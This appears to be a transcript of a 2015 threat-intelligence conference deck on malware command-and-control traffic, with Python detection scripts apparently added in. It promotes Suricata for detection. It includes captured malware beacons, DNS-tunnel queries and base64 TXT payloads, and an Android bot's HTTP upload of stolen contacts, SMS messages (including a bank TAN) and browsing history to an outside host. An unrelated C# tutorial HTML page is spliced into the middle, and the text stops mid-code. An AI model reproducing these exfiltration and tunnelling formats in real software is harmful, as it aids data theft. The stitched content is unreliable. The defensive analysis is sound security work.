emerging threats jonkman_sans_cti_summit_2015

CONFIDENTIAL Threat Intel: Winning the War with Open Source Tools Matt Jonkman CTO, Emerging Threats President, OISF

Upload: emerging-threats

Post on 16-Jul-2015


TRANSCRIPT

CONFIDENTIAL

Threat Intel: Winning the War

with Open Source Tools

Matt Jonkman

CTO, Emerging Threats

President, OISF


● 13+ year old open IDS community

● ET-Open IDS rules for Snort and Suricata

● ETPro Commercial rules

● IP and DNS reputation feeds

● Query Portal


Powering Network Defense Solutions Worldwide

• Installed in 10,000s of IDS/IPS sensors globally

• International staff of top threat researchers

• Trusted for timely, accurate, comprehensive threat intelligence


• HQ in Indianapolis, IN

• Originally founded as open source community in 2003

• Industry-leading cyber threat intelligence services

• ETPro™ Ruleset

• IQRisk™ Rep List

• IQRisk™ Query

• 500+ customers in over 40 countries worldwide


Agenda

● The Problem: Malware, Kits, Zombies

● How to APPLY data

● Suricata + Kibana + ETOpen + Rep Feeds


Malware Motivation

• Cash

• Data

• Warfare


Exploit Kits

Effective

Profitable

Constantly Refined


Command and Control

‣ IRC

‣ HTTP

‣ Non-Standard Protocols

‣ Custom Binary Channels

‣ Encrypted Channels


Command and Control

‣ SSL

‣ Emulate Known Good

‣ Social Networks

‣ Covert DNS Channels

‣ IM Networks

‣ SMS


Hello

xxxxxxxxxxxxxxxx.Windows XP.GT.Intel Pentium III Xeon processor.x86 Family 6 Model 7 Stepping xxx Mhz.xxxxxxx.RAM: 71 % used.RAM Total: xxxx MBs.Page File: xxxx MBs.Page File Disponible: xxxx MBs.Virt Mem Total: xxxxxxx MBs.Virt Mem Disponible: xxxxx MBs.Sin Asignar.192.168.xxxx xxx xx.<xxxxx>--


inicio#&'b##'#UserXXXX#&'b##'#192.168.XX.5#&'b##'#XX#&'b##'#XX-FXXXXXXXX5D#&'b##'#Microsoft Windows XP/Service Pack 3


In Plain Sight...

GET /index.html&_=13297496 HTTP/1.1
User-Agent: C3F0F3F7F6F485F4F4F9F7F3FAF9FBFAF3F5F9ACAFAEA6B1F2F9F3
Connection: Keep-Alive
Cache-Control: no-cache
Host: www.<redacted>.tk

GET / HTTP/1.1

User-Agent: 1427242021235223232E20242D2E213A253A26242E2525262621242E7B78797166252E24

Host: xx5c1b1ea.ws

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.1.11

Date: Sat, 07 Jan 2012 00:51:49 GMT

Content-Type: text/html

Content-Length: 189

Connection: keep-alive

Vary: Accept-Encoding

Expires: Wed, 28 Dec 2011 00:51:49 GMT

Cache-Control: no-cache

Pragma: no-cache

Cache-Control: no-store, no-cache, must-revalidate

Cache-Control: post-check=0, pre-check=0

<html>

<head>

<body style='margin:0px;padding:0px'>

<iframe border='none' style='width:100%;height:100%;border:medium

none;' src='http://1.ws/wc/"xx5c1b01ea.ws"'></iframe>

</body>

</html>
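The two captures above share one tell: the User-Agent is a bare hex string, which no browser ever sends. The following is an added example (not code from the deck or from Emerging Threats) that parses such requests and flags that pattern, plus the `&_=` cache-buster seen in the first request line. The sample requests are constructed from the slides with placeholder hostnames; the Suricata signature in the comment is written from the keyword documentation, not taken from the ET ruleset, and is an assumption in that sense.

```python
import re
from typing import Optional

# Constructed sample requests shaped like the two "In Plain Sight" captures above.
# Hostnames are placeholders; the third request is an ordinary browser request for contrast.
SAMPLE_REQUESTS = [
    "GET /index.html&_=13297496 HTTP/1.1\r\n"
    "User-Agent: C3F0F3F7F6F485F4F4F9F7F3FAF9FBFAF3F5F9ACAFAEA6B1F2F9F3\r\n"
    "Connection: Keep-Alive\r\nCache-Control: no-cache\r\nHost: www.example.tk\r\n\r\n",
    "GET / HTTP/1.1\r\n"
    "User-Agent: 1427242021235223232E20242D2E213A253A26242E2525262621242E7B78797166252E24\r\n"
    "Host: xx5c1b1ea.ws\r\nCache-Control: no-cache\r\n\r\n",
    "GET / HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0\r\n"
    "Host: www.example.com\r\n\r\n",
]

HEX_ONLY = re.compile(r"[0-9A-Fa-f]+")


def parse_request(raw: str) -> dict:
    """Split one HTTP/1.1 request head into a dict keyed by lower-cased header name."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    fields = {"request_line": lines[0]}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            fields[name.strip().lower()] = value.strip()
    return fields


def is_hex_user_agent(ua: str, min_len: int = 16) -> bool:
    """True when the UA is nothing but an even-length hex string of at least min_len chars."""
    return len(ua) >= min_len and len(ua) % 2 == 0 and HEX_ONLY.fullmatch(ua) is not None


def hex_ua_as_text(ua: str) -> Optional[str]:
    """Hex-decode the UA and return it as text only if every byte is printable ASCII.
    Both slide samples fail this: the bytes are obfuscated, not merely hex-wrapped."""
    data = bytes.fromhex(ua)
    if all(0x20 <= b < 0x7F for b in data):
        return data.decode("ascii")
    return None


def triage(raw: str) -> list[str]:
    """Return the reasons this request deserves a look; an empty list means it looks normal."""
    fields = parse_request(raw)
    ua = fields.get("user-agent")
    reasons = []
    if ua is None:
        reasons.append("no User-Agent header")
    elif is_hex_user_agent(ua):
        decoded = hex_ua_as_text(ua)
        detail = f" (decodes to {decoded!r})" if decoded else " (not plain text after hex decode)"
        reasons.append("hex-only User-Agent" + detail)
    if "&_=" in fields["request_line"]:
        reasons.append("cache-buster style parameter in request line")
    return reasons


# Equivalent Suricata signature (assumption: written from the Suricata keyword docs, not
# an ET rule). The /V pcre modifier restricts the match to the normalized User-Agent buffer:
#   alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"LOCAL hex-only User-Agent";
#     flow:established,to_server; pcre:"/^[0-9A-Fa-f]{16,}$/V";
#     classtype:trojan-activity; sid:9000001; rev:1;)

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(parse_request(req)["host"], "->", triage(req) or "ok")
```

The hex decode step matters for the analyst, not the detector: if the bytes come out as readable text the beacon format is already known; if not, as with both captures here, the string is an encoded or XOR-obfuscated host fingerprint and the sample needs to be reversed.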


No One Will See Me on Port 80....

I’m a Ninja!


I’ll Make Up a l33t Protocol....


SSL!


<!-- k7a63YKrBr5NBnpY --><html><head><meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>C# Tutorial: GDI Drawing with Pen and Brush</title>

<LINK REL=StyleSheet HREF="default-1.css" tppabs="http://csharpcomputing.com/Tutorials/default.css" type="text/css">

</head><body>

<p>&nbsp;<a href="Lesson14.htm" tppabs="http://csharpcomputing.com/Tutorials/Lesson14.htm"><img border="0" src="PreviousArrow.gif"

tppabs="http://csharpcomputing.com/images/PreviousArrow.gif" width="26" height="26"></a>&nbsp;&nbsp;&nbsp;

<a href="index.htm" tppabs="http://csharpcomputing.com/Tutorials/index.htm"><img border="0" src="TOCIcon.gif"

tppabs="http://csharpcomputing.com/images/TOCIcon.gif" width="26" height="26"></a>&nbsp;&nbsp;&nbsp;

<a href="Lesson16.htm" tppabs="http://csharpcomputing.com/Tutorials/Lesson16.htm"><img border="0" src="NextArrow.gif"

tppabs="http://csharpcomputing.com/images/NextArrow.gif" width="26" height="26"></a></p>

<p><img border="0" src="blueline.gif" tppabs="http://csharpcomputing.com/images/blueline.gif" width="550" height="8"></p>

<h1>C# Tutorial, Lesson 15: Drawing with Pen and Brush.<br>

</h1>

<!-- {/*jgJ-.J} -->

<p>In this lesson I would like to introduce the Pen&nbsp;and the Brush objects. These objects are members of GDI+ library.

GDI+ or GDI.NET is a graphics library that lets you draw on a form. Prior to

.NET, C programmers were using GDI library to create breathtaking graphics.

GDI.NET is in fact just a wrapper for GDI. GDI+ is a great platform for

moderately complicated static graphs. However, it tends to be slow for moving

images and not sophisticated enough for 3 dimensional graphics. On Windows NT

platforms, GDI+ as well as GDI do not perform very well. The problem lies in the

way GDI/GDI+ runs. Windows NT architecture accepts user input in so called user

context and access graphics devices in system context. When GDI/GDI+ application

runs on Windows NT based machine, it has to constantly wait for these context

switches to occur. This makes GDI/GDI+ applications too slow for video game

programming and fancy 3 D graphics. Microsoft recently released a highly

optimized graphics platform - Managed DirectX which I will cover in a separate

tutorial.</p>

<script type="text/javascript"

src="show_ads.js" tppabs="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>

<p>The



Covert DNS Channels

23546.1.d869c6f2f70dd3dcf64b047f99f46be8.chr.santa-inbox.com

0-4-2-6-4-1-9-2-e-8-v-3-c-g-o-s-0-s-0-o-s-1-b-e-6-u-v-3-f-r-k.0-0-0-0-0-0-0-0-0-0-0-0-0-60-0-0-0-0-0-0-0-0-0-0-0-0-0.info


Covert DNS Channels

Request: TXT 2.32206.pf.deoderante.com

Response: E9XnBP6CTP7zjAK43bg3RWWBwX5JpuFyTTpphcekpDR9nFPT7kzB3WEf9xe7fUAeFH4h1xWODFappd3kVXwLLdzAzjDSUs/ssIHbc8OFxhrw1D5Uh3UI1il+d5sa3oKB8qqo9oA8d5Jy4g7uwiScX+cBVkkrMMSsrAYTAiOjQswiVgU5AxQMybshGD0H0jRJVjBob6CLqMgcO0mpzxR1ccVbb8oG


Covert DNS Channels

"606.32206.pf.deoderante.com" "YSVYuqd74esaWH10c1EpO+MlAHKnQYqmETuEmHsaBHNYXms0/cL741mv0/ZmFmH8rQPc/B2omFruELm/SoDpbKrXTXQQ3fGk8r8QwNserz4SsHvcb98MCf9hpXwz"
"125.32206.pf.deoderante.com" "ggSpBMkIvbQslNeiqAu47PnoWzYGV+8Z+3QJy06TYqoEJOHamYVvr7Wqh+zunjz3AkMPOr/aQoG5eytRn0zFxrU6tWGs8hHtVBh+YKExbc420fkDd+7hEgLAde5zpAiF4w7c"
"129.32206.pf.deoderante.com" "xf6cEqa+Kd9VHXFIglLDOmRprsAm0y+cGQetG9Ox+oTmKueMnNRMsw7y8Z3qwbm1foIEWo80bYoP894mAU1SmSOczlZJl2SOfUzDfqXk0EVoTYpqojSL/el6P3X74b"
"258.32206.pf.deoderante.com" "6Wq0OwvOLXPc4pY+ZEiwckGuOj2ytpWGIRqJVvaIigexqtErvq2eB4snZ98ai4/akXm51LTtSd/Ab6znCgv3J8Fp5rqHfxclsZsIg4sQgsg6OSXnIbe6KqA8fqpcmySO3asGYKSpiq4"
"82.32206.pf.deoderante.com" "wZrGGAUcq6KyLpHS6UJ33gsU9nHlVKVQb0c/vW/SMqcBJBGCAXgWhuM/Yznuy2GxuGqofc00+/WZDDXggkjMatgMGwpuxnTulFhMltiUPDeZqIuwMvuEL5W8U/iR"
"102.32206.pf.deoderante.com" "NcZigfVXSSbQvBgvyTzOswy2FycXceUFIuFpv3LCtKmtEZp1dv5j/46+/hHUbqdDktJrJwtf7m5kbTsehyGSuge/sI+3kpuHvfDLq7BhJjxnowc4cfSjnxtUrddTLwmaDdqdTLGpMJA"
"77.32206.pf.deoderante.com" "yXdQW5d2ZP7flSblgCSyk+dw5l3htIA+cAzVH77xDYDygFKdr/uR+88sdtq9YgjnWLKYCSP3y4AlL/pdx5MEvQl/CkFB6CwDtIqTMf4Jv0CeAHSgDOH0g8cfzO+tH5YbjNF1a"
"346.32206.pf.deoderante.com" "NlqjMiVKOLB/nLZ+w7x1130GwXmfICCvuLcyLGQDRxBWeTNbP5K8u9qlyX4WzcEWoPHkKcY/Ql+B63+zOwoGjnGbkmrKxefk+BxVFrs+ll+2/4k2WtwaltVdNKpa2A"
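The three covert-DNS slides show two different shapes of tunnel: data stuffed into the query name (the santa-inbox.com and dashed .info names) and data pulled down in TXT answers (the deoderante.com exchange, where each query name is short and harmless-looking). An added example, not from the deck, that scores both, using the names and the TXT answer from the slides as input; the SPF record and the two benign hostnames are constructed for contrast, and the two-label registered-domain split is an assumption standing in for a public-suffix list.

```python
import math
import re
from collections import Counter, defaultdict

# Query names and one TXT answer from the slides above. Benign names and the SPF record
# are constructed here for contrast.
TUNNEL_NAMES = [
    "23546.1.d869c6f2f70dd3dcf64b047f99f46be8.chr.santa-inbox.com",
    "0-4-2-6-4-1-9-2-e-8-v-3-c-g-o-s-0-s-0-o-s-1-b-e-6-u-v-3-f-r-k."
    "0-0-0-0-0-0-0-0-0-0-0-0-0-60-0-0-0-0-0-0-0-0-0-0-0-0-0.info",
]
TXT_QUERY_LOG = [f"{n}.32206.pf.deoderante.com" for n in (2, 606, 125, 129, 258, 82, 102, 77, 346)]
TXT_ANSWER = ("E9XnBP6CTP7zjAK43bg3RWWBwX5JpuFyTTpphcekpDR9nFPT7kzB3WEf9xe7fUAeFH4h1xWODFappd3kVXwLLdzAzjDSUs/"
              "ssIHbc8OFxhrw1D5Uh3UI1il+d5sa3oKB8qqo9oA8d5Jy4g7uwiScX+cBVkkrMMSsrAYTAiOjQswiVgU5AxQMybshGD0H0jRJVjBob6CLqMgcO0mpzxR1ccVbb8oG")
BENIGN_NAMES = ["nl.archive.ubuntu.com", "www.rememberthemilk.com"]
BENIGN_TXT = "v=spf1 include:_spf.example.net ~all"

B64_PAYLOAD = re.compile(r"[A-Za-z0-9+/]{100,}={0,2}")


def shannon_entropy(s: str) -> float:
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values()) if s else 0.0


def registered_domain(name: str) -> str:
    """Last two labels. Crude stand-in for a public-suffix list (assumes no multi-label TLDs)."""
    return ".".join(name.rstrip(".").split(".")[-2:])


def name_features(name: str) -> dict:
    """Shape of everything left of the registered domain: that is where tunnels carry data."""
    sub_labels = name.rstrip(".").split(".")[:-2]
    sub = ".".join(sub_labels)
    return {
        "registered_domain": registered_domain(name),
        "subdomain_len": len(sub),
        "label_count": len(sub_labels),
        "longest_label": max((len(l) for l in sub_labels), default=0),
        "entropy": round(shannon_entropy(sub), 3),
        "hex_label": any(re.fullmatch(r"[0-9a-f]{16,}", l) for l in sub_labels),
    }


def looks_like_tunnel_name(name: str) -> bool:
    """Per-name heuristic: long or hash-like subdomains are payload, not hostnames."""
    f = name_features(name)
    return f["subdomain_len"] >= 40 or f["hex_label"] or (f["longest_label"] >= 30 and f["entropy"] >= 3.0)


def looks_like_tunnel_txt(rdata: str) -> bool:
    """A TXT answer that is one long base64 blob is a download channel, not SPF/DKIM/DMARC."""
    return B64_PAYLOAD.fullmatch(rdata.strip()) is not None


def unique_subdomains(names) -> dict:
    """Per registered domain, how many distinct names were queried: the passive-DNS view
    that catches the deoderante.com channel even though each single name looks innocent."""
    seen = defaultdict(set)
    for n in names:
        seen[registered_domain(n)].add(n)
    return {d: len(s) for d, s in seen.items()}


if __name__ == "__main__":
    for n in TUNNEL_NAMES + BENIGN_NAMES + TXT_QUERY_LOG[:1]:
        print(looks_like_tunnel_name(n), name_features(n))
    print(looks_like_tunnel_txt(TXT_ANSWER), looks_like_tunnel_txt(BENIGN_TXT))
    print(unique_subdomains(TXT_QUERY_LOG))
```

Note that `2.32206.pf.deoderante.com` passes the per-name check; only the answer size and the count of distinct names under one domain give it away, which is why the deck pairs IDS with passive DNS rather than relying on either alone.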


Android!

POST /upload.php HTTP/1.1

accept: application/json

Content-Length: 2958

Content-Type: application/x-www-form-urlencoded

Host: gi60s.com

Connection: Keep-Alive

User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Expect: 100-Continue

code=bb51d&data=%7B%22contacts%22%3A%5B%7B+%22name%22%3A%22Qm9i%0A%22%2C%22numbers%22%3A%22MDgxLTUwMTItMzQ1N

>jc4OTswODEtNTAxLTIzNDU2Nzg5Ow%3D%3D%0A%22%7D%2C%7B+%22name%22%3A%22RXZl%0A%22%2C%22numbers%22%3A%22MDY1LTAzM

>S0zMzc7MDY1LTAzMS0zMzc7%0A%22%7D%2C%7B+%22name%22%3A%22VHJlbnQ%3D%0A%22%2C%22numbers%22%3A%22MDE5LTk5OTswMTk

>tOTk5Ow%3D%3D%0A%22%7D%5D%2C%22sms%22%3A%5B%7B+%22address%22%3A%22MDgxNTEyMzQ1Njc4OQ%3D%3D%0A%22%2C%22type%2

>2%3A%221%22%2C%22date%22%3A%221337803772831%22%2C%22body%22%3A%22SGVsbG8gV29ybGQh%0A%22%7D%2C%7B+%22address%

>22%3A%22MDEwMjM0NQ%3D%3D%0A%22%2C%22type%22%3A%221%22%2C%22date%22%3A%221337766125374%22%2C%22body%22%3A%22W

>W91ciBzbXNUYW46IHQ0blMzY3IzVCAgQmVzdCBSZWdhcmRzIHlvdXIgQkFOSyE%3D%0A%22%7D%2C%7B+%22address%22%3A%22MDY1MDMx

>MzM3%0A%22%2C%22type%22%3A%221%22%2C%22date%22%3A%221337766074005%22%2C%22body%22%3A%22SGkhIEhvdyBhcmUgeW91P

>w%3D%3D%0A%22%7D%2C%7B+%22address%22%3A%22MDgxNTAxMjM0NTY3ODk%3D%0A%22%2C%22type%22%3A%221%22%2C%22date%22%3

>A%221337765998741%22%2C%22body%22%3A%22VGh4IGZvciB0aGUgcGFzc3dvcmQgOikgTWluZSBpczogbjB0UzNjcjNUIGdyZWV0eg%3D

>%3D%0A%22%7D%2C%7B+%22address%22%3A%22MDgxLTUwMTItMzQ1Njc4OQ%3D%3D%0A%22%2C%22type%22%3A%222%22%2C%22date%22

>%3A%221337765942437%22%2C%22body%22%3A%22TXkgc2VjcmV0IHBhc3N3b3JkIGlzOiB0MHBzM2NyM3Q%3D%0A%22%7D%2C%7B+%22ad

>dress%22%3A%22MDgxLTUwMTItMzQ1Njc4OQ%3D%3D%0A%22%2C%22type%22%3A%222%22%2C%22date%22%3A%221337765923366%22%2

>C%22body%22%3A%22SGkgQm9iLCBob3cgYXJlIHlvdT8%3D%0A%22%7D%5D%2C%22recent%22%3A%5B%7B+%22number%22%3A%220815123456789%22%2C%22type%22%3A%223%22%2C%22date%2

2%3A%221337

>803772327%22%2C%22duration%22%3A%220%22%7D%2C%7B+%22number%22%3A%22065031337%22%2C%22type%22%3A%221%22%2C%22

>date%22%3A%221337766141605%22%2C%22duration%22%3A%224%22%7D%2C%7B+%22number%22%3A%22065031337%22%2C%22type%2

>2%3A%222%22%2C%22date%22%3A%221337766020756%22%2C%22duration%22%3A%224%22%7D%2C%7B+%22number%22%3A%220815012

>3456789%22%2C%22type%22%3A%222%22%2C%22date%22%3A%221337765897517%22%2C%22duration%22%3A%224%22%7D%5D%2C%22u

>rl%22%3A%5B%7B+%22url%22%3A%22aHR0cDovL3d3dy5iYmMuY28udWsv%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy53ZWF

>0aGVyLmNvbS8%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5hbWF6b24uY29tLw%3D%3D%0A%22%7D%2C%7B+%22url%22%

>3A%22aHR0cDovL2VzcG4uY29tLw%3D%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5ueXRpbWVzLmNvbS8%3D%0A%22%7D%

>2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5jbm4uY29tL2luZGV4Lmh0bWw%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy

>5lYmF5LmNvbS8%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy53aWtpcGVkaWEub3JnLw%3D%3D%0A%22%7D%2C%7B+%22ur

>l%22%3A%22aHR0cDovL3d3dy5mYWNlYm9vay5jb20v%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5teXNwYWNlLmNvbS8%3D%

>0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5tc24uY29tLw%3D%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5

>5YWhvby5jb20v%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3BpY2FzYXdlYi5nb29nbGUuY29tL20vdmlld2VyP3NvdXJjZT1hbmRy

>b2lkY2xpZW50%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3d


code=bb51d&data=

{"contacts":[

{"name":"Qm9i","numbers":"MDgxLTUwMTItMzQ1Njc4OTswODEtNTAxLTIzNDU2Nzg5Ow=="},{"name":"RXZl","numbers":"MDY1LTAzMS0zMzc7MDY

1LTAzMS0zMzc7"},

{"name":"VHJlbnQ=","numbers":"MDE5LTk5OTswMTktOTk5Ow=="}],

"sms":[

{"address":"MDgxNTEyMzQ1Njc4OQ==","type":"1","date":"1337803772831","body":"SGVsbG8gV29ybGQh"},

{"address":"MDEwMjM0NQ==","type":"1","date":"1337766125374","body":"WW91ciBzbXNUYW46IHQ0blMzY3IzVCAgQmVzdCBSZWdhcmRzIHlvdX

IgQkFOSyE="},

{"address":"MDY1MDMxMzM3","type":"1","date":"1337766074005","body":"SGkhIEhvdyBhcmUgeW91Pw=="},

{"address":"MDgxNTAxMjM0NTY3ODk=","type":"1","date":"1337765998741","body":"VGh4IGZvciB0aGUgcGFzc3dvcmQgOikgTWluZSBpczogbj

B0UzNjcjNUIGdyZWV0eg=="},

{"address":"MDgxLTUwMTItMzQ1Njc4OQ==","type":"2","date":"1337765942437","body":"TXkgc2VjcmV0IHBhc3N3b3JkIGlzOiB0MHBzM2NyM3

Q="},

{"address":"MDgxLTUwMTItMzQ1Njc4OQ==","type":"2","date":"1337765923366","body":"SGkgQm9iLCBob3cgYXJlIHlvdT8="}],

"recent":[

{"number":"0815123456789","type":"3","date":"1337803772327","duration":"0"},

{"number":"065031337","type":"1","date":"1337766141605","duration":"4"},

{"number":"065031337","type":"2","date":"1337766020756","duration":"4"},

{"number":"08150123456789","type":"2","date":"1337765897517","duration":"4"}],

"url":[

{"url":"aHR0cDovL3d3dy5iYmMuY28udWsv"},

{"url":"aHR0cDovL3d3dy53ZWF0aGVyLmNvbS8="},

{"url":"aHR0cDovL3d3dy5hbWF6b24uY29tLw=="},

{"url":"aHR0cDovL2VzcG4uY29tLw=="},

{"url":"aHR0cDovL3d3dy5ueXRpbWVzLmNvbS8="},

{"url":"aHR0cDovL3d3dy5jbm4uY29tL2luZGV4Lmh0bWw="},

{"url":"aHR0cDovL3d3dy5lYmF5LmNvbS8="},

{"url":"aHR0cDovL3d3dy53aWtpcGVkaWEub3JnLw=="},

{"url":"aHR0cDovL3d3dy5mYWNlYm9vay5jb20v"},

{"url":"aHR0cDovL3d3dy5teXNwYWNlLmNvbS8="},

{"url":"aHR0cDovL3d3dy5tc24uY29tLw=="},

{"url":"aHR0cDovL3d3dy55YWhvby5jb20v"},

{"url":"aHR0cDovL3BpY2FzYXdlYi5nb29nbGUuY29tL20vdmlld2VyP3NvdXJjZT1hbmRyb2lkY2xpZW50"}

code=bb51d&data=

{"contacts":[

{"name":"Bob","numbers":"081-5012-3456789;081-501-23456789;"},

{"name":"Eve","numbers":"065-031-337;065-031-337;"},

{"name":"Trent","numbers":"019-999;019-999;"}],

"sms":[

{"address":"0815123456789","type":"1","date":"1337803772831","body":"Hello World!"},

{"address":"0102345","type":"1","date":"1337766125374","body":"Your smsTan: t4nS3cr3T Best Regards your BANK!"},

{"address":"065031337","type":"1","date":"1337766074005","body":"Hi! How are you?"},

{"address":"08150123456789","type":"1","date":"1337765998741","body":"Thx for the password :) Mine is: n0tS3cr3T greetz"},

{"address":"081-5012-3456789","type":"2","date":"1337765942437","body":"My secret password is: t0ps3cr3t"},

{"address":"081-5012-3456789","type":"2","date":"1337765923366","body":"Hi Bob, how are you?"}],

"recent":[

{"number":"0815123456789","type":"3","date":"1337803772327","duration":"0"},

{"number":"065031337","type":"1","date":"1337766141605","duration":"4"},

{"number":"065031337","type":"2","date":"1337766020756","duration":"4"},

{"number":"08150123456789","type":"2","date":"1337765897517","duration":"4"}],

"url":[

{ "url":"http://www.bbc.co.uk/"},

{ "url":"http://www.weather.com/"},

{ "url":"http://www.amazon.com/"},

{ "url":"http://espn.com/"},

{ "url":"http://www.nytimes.com/"},

{ "url":"http://www.cnn.com/"},

{ "url":"http://www.ebay.com/"},

{ "url":"http://www.wikipedia.org/"},

{ "url":"http://www.facebook.com/"},

{ "url":"http://www.myspace.com/"},

{ "url":"http://www.msn.com/"},

{ "url":"http://www.yahoo.com/"},

{ "url":"http://picasaweb.google.com/m/viewer?source=androidclient"}
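The three slides above walk the upload through its layers by hand: form encoding, then JSON, then a base64 string (with a trailing newline) for every value the bot wants to hide. An added example, not from the deck, that does the same unwrapping programmatically. The request body is constructed here with the same layout as the gi60s.com capture but cut to two records; the contact and SMS values are the ones on the slide.

```python
import base64
import json
import re
from urllib.parse import parse_qs

# Constructed body in the shape of the upload above: form-encoded "data" holding JSON whose
# string values are base64 followed by a newline (the %0A after each value in the capture).
SAMPLE_BODY = (
    "code=bb51d&data=%7B%22contacts%22%3A%5B%7B+%22name%22%3A%22Qm9i%0A%22%2C"
    "%22numbers%22%3A%22MDgxLTUwMTItMzQ1Njc4OTs%3D%0A%22%7D%5D%2C"
    "%22sms%22%3A%5B%7B+%22address%22%3A%22MDEwMjM0NQ%3D%3D%0A%22%2C%22type%22%3A%221%22%2C"
    "%22date%22%3A%221337766125374%22%2C%22body%22%3A%22SGVsbG8gV29ybGQh%0A%22%7D%5D%7D"
)

B64 = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def decode_field(value: str) -> str:
    """Base64-decode a string value when it is well-formed base64 that yields printable text;
    otherwise return it untouched, so plain fields such as type, date and duration survive.
    The length check matters: a 13-digit timestamp is not valid base64, but a 4- or 8-digit
    number would be, and would silently turn into garbage bytes without the printable test."""
    s = value.strip()
    if not s or len(s) % 4 or not B64.fullmatch(s):
        return value
    try:
        text = base64.b64decode(s, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return value
    return text if text.isprintable() else value


def decode_tree(node):
    """Walk the parsed JSON and decode every string leaf."""
    if isinstance(node, dict):
        return {k: decode_tree(v) for k, v in node.items()}
    if isinstance(node, list):
        return [decode_tree(v) for v in node]
    if isinstance(node, str):
        return decode_field(node)
    return node


def decode_upload(body: str) -> dict:
    """code=...&data=<urlencoded JSON>  ->  {"code": ..., "data": decoded JSON}."""
    form = parse_qs(body, keep_blank_values=True)
    # strict=False: the bot leaves raw newlines inside JSON strings, which a strict parser
    # rejects as unescaped control characters.
    data = json.loads(form["data"][0], strict=False)
    return {"code": form["code"][0], "data": decode_tree(data)}


if __name__ == "__main__":
    print(json.dumps(decode_upload(SAMPLE_BODY), indent=2))
```

Run against the full capture the same function recovers the contact list, the bank's smsTAN message and the browser history shown on the last slide; the `code` value is the bot's install identifier and is deliberately left alone.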


Defend Yourself!


Use the Tools!

Defense in Layers

Defense


Suricata!!!

Intrusion Detection


Suricata – Cost-effective IDS

• Open-source IDPS

• Developed by the OISF

• First beta introduced in December 2009

• Supported OS
  • FreeBSD
  • Linux
  • UNIX
  • Mac OS
  • Microsoft Windows

• Licensing and Availability
  • GNU General Public License
  • www.suricata-ids.org


Current Release 2.0.6

and 2.1 beta

Many Agencies

Many Products

The IDPS of the Future


Top Reasons to Try Suricata


Multi-Threaded Engine


Automated Protocol Detection


IP Reputation at Speed


File Identification

File Extraction

File MD5sum

File_magic Identification


SSL Cert Extraction/Matching

SSL Analysis

SSL Logging


Cute Mascot


Lua Scripting

NSM Mode

Netflow Logging


Open Source in a Non-Profit!


JSON Output


Monitor and Log!

Defense

{
  "timestamp": "2014-11-18T12:40:42.744230",
  "flow_id": 2901423184,
  "event_type": "fileinfo",
  "src_ip": "213.136.29.218", "src_port": 80,
  "dest_ip": "192.168.1.4", "dest_port": 53652,
  "proto": "TCP",
  "http": {
    "url": "/ubuntu/pool/main/u/util-linux/bsdutils_2.20.1-5.1ubuntu20.3_i386.deb",
    "hostname": "nl.archive.ubuntu.com",
    "http_user_agent": "Debian APT-HTTP/1.3 (1.0.1ubuntu2)"
  },
  "fileinfo": {
    "filename": "/ubuntu/pool/main/u/util-linux/bsdutils_2.20.1-5.1ubuntu20.3_i386.deb",
    "magic": "Debian binary package (format 2.0)",
    "state": "CLOSED",
    "md5": "6a1a4e3b53d4ff02cd3ded3cf0ce3a42",
    "stored": false,
    "size": 5475,
    "tx_id": 2
  }
}


{
  "timestamp": "2014-11-21T08:11:45.222089",
  "flow_id": 2896612328,
  "event_type": "tls",
  "src_ip": "23.206.115.50", "src_port": 443,
  "dest_ip": "10.8.0.6", "dest_port": 47063,
  "proto": "TCP",
  "tls": {
    "subject": "serialNumber=5189573, unknown=US, unknown=Delaware, unknown=Private Organization, C=US, unknown=94107, ST=California, L=San Francisco, unknown=855 FOLSOM ST APT 535, O=Remember The Milk Inc., OU=Comodo EV SAN SSL, CN=www.rememberthemilk.com",
    "issuerdn": "C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO Extended Validation Secure Server CA 2",
    "fingerprint": "0b:1e:68:8c:ec:9f:7a:9c:70:4f:58:41:fb:c6:53:ba:ba:e1:6c:af",
    "version": "TLS 1.2"
  }
}

{
  "timestamp": "2014-11-21T08:32:22.001162",
  "flow_id": 2904615464,
  "event_type": "netflow",
  "src_ip": "23.206.107.75", "src_port": 443,
  "dest_ip": "10.8.0.6", "dest_port": 52556,
  "proto": "TCP",
  "netflow": {
    "app_proto": "tls", "pkts": 73, "bytes": 66135,
    "start": "2014-11-21T08:28:08.789426", "end": "2014-11-21T08:30:19.242083", "age": 131
  },
  "tcp": {"tcp_flags": "1b", "syn": true, "fin": true, "psh": true, "ack": true}
}
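Each of the three records above is one line in Suricata's eve.json, and the point of the JSON output is that anything can consume it before it reaches ELK. An added example, not code from the deck or from OISF, that reads the three slide records line by line, dispatches on event_type, and applies one check per type: blocklisted file hash or executable file magic, self-signed or legacy-version TLS, and long-lived flows. The fourth record (a self-signed certificate), the md5 blocklist (which holds only the md5 of the empty string, so the Ubuntu package passes) and the 120-second flow threshold are constructed assumptions for the demonstration.

```python
import json
from collections import Counter

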